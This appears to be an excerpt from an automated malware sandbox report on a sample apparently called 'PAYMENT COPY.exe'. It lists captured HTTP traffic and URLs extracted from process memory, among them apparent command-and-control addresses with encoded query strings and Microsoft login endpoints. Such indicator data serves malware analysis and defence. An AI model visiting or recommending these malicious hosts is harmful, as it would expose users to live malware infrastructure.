Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: User-AgentLink: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 90 60 e6 5a c1 91 d2 21 7f 99 73 ef 0d 86 b7 3a b1 38 1a bd 86 9f 1e e3 9b ba 35 cc 8b 52 42 f0 c3 9d dc 3a 82 aa 81 f8 de 70 21 60 69 b4 f5 9e 1f bc 14 95 9f 1f 55 b0 10 1c f0 85 a9 10 fd 79 02 b8 16 fe 88 eb 05 58 58 2f b9 6a 75 a9 bd bb 1a e5 ff c0 5d 55 5a a8 0a fa 10 29 5d 6b 29 f5 f2 2a da 9f 5d 79 49 0a 75 8e 2c c8 a3 ab 95 72 d8 58 a8 c1 f3 f9 55 34 b7 50 1f 5d dd df 87 b6 b4 8c 03 e6 ba 53 0e a4 b6 84 eb f6 2a da 9f 5d 09 fe 36 72 9e 79 47 96 26 d4 2b c7 e9 ef 9f 5f cf c1 1b c6 cf c9 52 db ca 58 70 0e bf 1e c6 f6 13 dc 74 a5 14 1c 33 23 fe 7b 7b 51 d2 58 b6 60 9e 11 70 b5 a3 70 63 8e bf d7 23 26 3d 58 c5 3c 8c 90 5f 19 38 1a 31 63 a4 e0 cc 0b ad f6 ad 73 d7 fb 56 8e 90 17 5e c2 d1 e8 56 d6 7f 8b e8 6f 2c 7b ab d3 53 34 bc f8 d9 70 f9 db e1 c5 a7 c3 8b ef 8d 10 bd 37 a3 b9 f7 c6 e5 6c f2 bb 67 bf 06 a8 f6 47 78 fc 24 be fc 64 78 f1 9b e1 c5 27 c3 8b ef e2 f4 86 5c b7 2d 28 ef 90 fb ce af bc f4 75 8c d1 e3 5b 0f d1 e3 93 fb 8f ee dd 42 8f 8e 6f 7e 13 25 24 26 11 c2 78 76 e5 25 82 fc 20 66 29 4d 73 34 bc f8 c5 f0 e2 d3 e1 f2 df 87 ed 0f bf fc f0 07 c3 f6 9f 86 ed 0f 86 cb ef 0f db ff 3b 6c 7f 39 5c be 37 6c 3f 1a b6 3f 1f b6 1f 20 8c b0 9f 78 69 1f 88 2e e4 58 38 a5 2c a0 17 eb e5 70 15 38 6e 85 11 39 ef f7 e5 77 fe f0 d5 3f 7c 6f b8 fc 8f e1 c5 2f 86 cb 7f 21 c6 ff 95 7e 3f bc f8 f5 57 bf f8 d5 67 7f fa 64 78 7b 7b f7 f1 a3 bd 2f fe e3 fb 5f fc cf 3f 0f db 9f 0d 97 ef fd f5 d3 ef 0d 6f 6f 8f c9 cb e4 ee cb 7f fd f4 bb 9f 7f f2 bb cf df f9 f1 e7 ff fc eb cf df fd d1 5f 3f fd de Data Ascii: 4c11?_p18NXknA/$F2M$,T
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: User-AgentLink: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 90 60 e6 5a c1 91 d2 21 7f 99 73 ef 0d 86 b7 3a b1 38 1a bd 86 9f 1e e3 9b ba 35 cc 8b 52 42 f0 c3 9d dc 3a 82 aa 81 f8 de 70 21 60 69 b4 f5 9e 1f bc 14 95 9f 1f 55 b0 10 1c f0 85 a9 10 fd 79 02 b8 16 fe 88 eb 05 58 58 2f b9 6a 75 a9 bd bb 1a e5 ff c0 5d 55 5a a8 0a fa 10 29 5d 6b 29 f5 f2 2a da 9f 5d 79 49 0a 75 8e 2c c8 a3 ab 95 72 d8 58 a8 c1 f3 f9 55 34 b7 50 1f 5d dd df 87 b6 b4 8c 03 e6 ba 53 0e a4 b6 84 eb f6 2a da 9f 5d 09 fe 36 72 9e 79 47 96 26 d4 2b c7 e9 ef 9f 5f cf c1 1b c6 cf c9 52 db ca 58 70 0e bf 1e c6 f6 13 dc 74 a5 14 1c 33 23 fe 7b 7b 51 d2 58 b6 60 9e 11 70 b5 a3 70 63 8e bf d7 23 26 3d 58 c5 3c 8c 90 5f 19 38 1a 31 63 a4 e0 cc 0b ad f6 ad 73 d7 fb 56 8e 90 17 5e c2 d1 e8 56 d6 7f 8b e8 6f 2c 7b ab d3 53 34 bc f8 d9 70 f9 db e1 c5 a7 c3 8b ef 8d 10 bd 37 a3 b9 f7 c6 e5 6c f2 bb 67 bf 06 a8 f6 47 78 fc 24 be fc 64 78 f1 9b e1 c5 27 c3 8b ef e2 f4 86 5c b7 2d 28 ef 90 fb ce af bc f4 75 8c d1 e3 5b 0f d1 e3 93 fb 8f ee dd 42 8f 8e 6f 7e 13 25 24 26 11 c2 78 76 e5 25 82 fc 20 66 29 4d 73 34 bc f8 c5 f0 e2 d3 e1 f2 df 87 ed 0f bf fc f0 07 c3 f6 9f 86 ed 0f 86 cb ef 0f db ff 3b 6c 7f 39 5c be 37 6c 3f 1a b6 3f 1f b6 1f 20 8c b0 9f 78 69 1f 88 2e e4 58 38 a5 2c a0 17 eb e5 70 15 38 6e 85 11 39 ef f7 e5 77 fe f0 d5 3f 7c 6f b8 fc 8f e1 c5 2f 86 cb 7f 21 c6 ff 95 7e 3f bc f8 f5 57 bf f8 d5 67 7f fa 64 78 7b 7b f7 f1 a3 bd 2f fe e3 fb 5f fc cf 3f 0f db 9f 0d 97 ef fd f5 d3 ef 0d 6f 6f 8f c9 cb e4 ee cb 7f fd f4 bb 9f 7f f2 bb cf df f9 f1 e7 ff fc eb cf df fd d1 5f 3f fd de Data Ascii: 4c11?_p18NXknA/$F2M$,T
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:23:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: User-AgentLink: <https://embrace-counselor.com/wp-json/>; rel="https://api.w.org/"Content-Encoding: brData Raw: 34 63 31 31 0d 0a a5 ff 9f 00 00 fe fc ca b4 be dd 3f 5f 70 31 38 cd ec 4e 80 c8 ab 58 cc 12 6b cc 6e f5 41 b9 2f b9 bb dd a2 24 46 06 12 f9 32 0b 4d 24 00 01 c8 aa 2c d6 54 84 8a ad 0d df 6b 8d 65 8f 47 b6 37 64 af 67 25 1f 23 8f 63 b4 b3 3b 13 d6 ee 7e fd 6f 8e ae 2f 5f ef ff ab da cb 91 53 a4 4d 53 b9 ce 4c 5a 02 0f a4 9c 71 ca a4 f1 58 4d 8a 94 29 9a fd 9c e2 be f7 ee 4c f0 61 81 0f 0b 00 64 41 4a 2a 00 92 05 28 6a 3f e7 3e de 7b ee 7d 10 f0 f0 a8 21 3e ca 10 24 a8 11 41 3a 26 40 da 23 51 b6 8a 50 94 0a c9 93 42 96 53 d8 5d 1c a7 72 95 a2 21 e9 cf 48 1e 8f 27 e3 49 e1 4c 66 52 a4 4e 9b 5e fe 34 45 9a d2 4d 9f 3a cb e8 9b ff 7f 6d dd da e3 d6 fa 5e 1d 20 84 10 42 08 df f1 07 f0 d2 d7 5f 7e 78 f3 c9 e9 a3 5b 68 ee 5b 39 bb f2 d2 dc b7 12 49 a6 9a a3 d1 73 36 42 15 f3 0c 4b cd 2a a8 8e 46 35 93 0e ae 1f da 71 ab a5 7c fb be 9a 16 54 77 34 e2 52 3b a8 46 b3 2b 2f cd 81 55 b3 2b 2f b5 e0 19 e2 73 66 1d f8 a3 51 e7 6b 3c 19 3d fe 79 15 6b e1 68 54 6b db 32 8f 2b f0 c0 bd d0 6a 84 b8 56 1e 94 3f 1a 79 90 60 e6 5a c1 91 d2 21 7f 99 73 ef 0d 86 b7 3a b1 38 1a bd 86 9f 1e e3 9b ba 35 cc 8b 52 42 f0 c3 9d dc 3a 82 aa 81 f8 de 70 21 60 69 b4 f5 9e 1f bc 14 95 9f 1f 55 b0 10 1c f0 85 a9 10 fd 79 02 b8 16 fe 88 eb 05 58 58 2f b9 6a 75 a9 bd bb 1a e5 ff c0 5d 55 5a a8 0a fa 10 29 5d 6b 29 f5 f2 2a da 9f 5d 79 49 0a 75 8e 2c c8 a3 ab 95 72 d8 58 a8 c1 f3 f9 55 34 b7 50 1f 5d dd df 87 b6 b4 8c 03 e6 ba 53 0e a4 b6 84 eb f6 2a da 9f 5d 09 fe 36 72 9e 79 47 96 26 d4 2b c7 e9 ef 9f 5f cf c1 1b c6 cf c9 52 db ca 58 70 0e bf 1e c6 f6 13 dc 74 a5 14 1c 33 23 fe 7b 7b 51 d2 58 b6 60 9e 11 70 b5 a3 70 63 8e bf d7 23 26 3d 58 c5 3c 8c 90 5f 19 38 1a 31 63 a4 e0 cc 0b ad f6 ad 73 d7 fb 56 8e 90 17 5e c2 d1 e8 56 d6 7f 8b e8 6f 2c 7b ab d3 53 34 bc f8 d9 70 f9 db e1 c5 a7 c3 8b ef 8d 10 bd 37 a3 b9 f7 c6 e5 6c f2 bb 67 bf 06 a8 f6 47 78 fc 24 be fc 64 78 f1 9b e1 c5 27 c3 8b ef e2 f4 86 5c b7 2d 28 ef 90 fb ce af bc f4 75 8c d1 e3 5b 0f d1 e3 93 fb 8f ee dd 42 8f 8e 6f 7e 13 25 24 26 11 c2 78 76 e5 25 82 fc 20 66 29 4d 73 34 bc f8 c5 f0 e2 d3 e1 f2 df 87 ed 0f bf fc f0 07 c3 f6 9f 86 ed 0f 86 cb ef 0f db ff 3b 6c 7f 39 5c be 37 6c 3f 1a b6 3f 1f b6 1f 20 8c b0 9f 78 69 1f 88 2e e4 58 38 a5 2c a0 17 eb e5 70 15 38 6e 85 11 39 ef f7 e5 77 fe f0 d5 3f 7c 6f b8 fc 8f e1 c5 2f 86 cb 7f 21 c6 ff 95 7e 3f bc f8 f5 57 bf f8 d5 67 7f fa 64 78 7b 7b f7 f1 a3 bd 2f fe e3 fb 5f fc cf 3f 0f db 9f 0d 97 ef fd f5 d3 ef 0d 6f 6f 8f c9 cb e4 ee cb 7f fd f4 bb 9f 7f f2 bb cf df f9 f1 e7 ff fc eb cf df fd d1 5f 3f fd de Data Ascii: 4c11?_p18NXknA/$F2M$,T
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:33 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: http://www.drednents.esVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JHelHxjpgicv8xl%2B2Fi2igkr0QVWW1nsKk6VfGvWF%2FToU74I%2B9q%2Bzv8Z42oW5ocga0kscFqb1VzFjSI%2FNofb3Q9BzUALQbuDIgPOngGraGGAgL8dXg8RmBndBWe2dfO5pvW0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a498d8d41db-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:36 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: http://www.drednents.esVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fg0G%2BUY373NymVd4bYGVGpwz5W85m9ShPWNXM8YHchBcnG5v1JwGvOko6hVnq6Fft3Pt2x11adbKZoIiyEh%2Fq2kMZU4wEv0Xy7D7jCHba9IWJNDTl%2FDYfT1521AtyC6OS7h2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a59fcf7181d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:39 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeAccess-Control-Allow-Origin: http://www.drednents.esVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhXBWkFoELlqTpd97BSDvjWkW%2FO83QA%2FaCqzRbEO%2FeuKXQlsff%2FPFT7Nkn%2Bj9tqY7srBcTwdyuniL0oB8rpTvOYaIrWNajhWnQx0cwBIk%2FofUkOsmLTOiFtvVzUrEeXqyAtM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a69dc214326-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:23:41 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeVary: Origin, Accept-EncodingAccess-Control-Allow-Credentials: trueX-XSS-Protection: 1; mode=blockX-Frame-Options: DENYX-Download-Options: noopenX-Content-Type-Options: nosniffETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3BK76tXvW1IJNnKCjCxV6mgifOb0z6REFTfKKCpTHtZA2%2FHLxkvlpzMCZI1jVBcCKK0AGn043yvxe6MpDJe9fy2af4N9qkt5iFVApuZATvzUPIXJ%2FboVNG7fn5QjEV9Q%2Buh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 88a54a79a9291a03-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found

Source: gpresult.exe, 0000000D.00000002.4949275030.000000000670E000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003F3E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://arsenjev.fun/oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000058EC000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.000000000311C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://celluslim.com.br/y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000068A0000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000040D0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://embrace-counselor.com/5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpO
Source: firefox.exe, 00000015.00000002.2995518665.0000022CE0647000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://help.yahoo.com/help/us/ysearch/slurp)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000055C8000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002DF8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZ
Source: PAYMENT COPY.exe, 00000000.00000002.2533735026.0000000002ABF000.00000004.00000800.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 0000000A.00000002.2583123320.0000000002F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4950914597.0000000004B70000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drednents.es
Source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4950914597.0000000004B70000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.drednents.es/9bwj/
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://2domains.ru
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003440000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003440000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000005F34000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003764000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gpresult.exe, 0000000D.00000003.2883708904.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Medium.woff2)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-Regular.woff2)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://files.reg.ru/fonts/inter/Inter-SemiBold.woff2)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=expired
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: gpresult.exe, 0000000D.00000002.4945562552.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: gpresult.exe, 0000000D.00000003.2878831218.0000000007999000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: gpresult.exe, 0000000D.00000002.4949275030.000000000657C000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ovipanel.in/
Source: gpresult.exe, 0000000D.00000002.4949275030.000000000657C000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003DAC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ovipanel.in/tutorials
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000052A4000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000002AD4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://reg.ru?target=_blank
Source: firefox.exe, 00000015.00000002.2988125220.0000000020C24000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://server5.hosting.reg.ru/manager
Source: gpresult.exe, 0000000D.00000002.4949275030.0000000006258000.00000004.10000000.00040000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.0000000003A88000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://tilda.cc
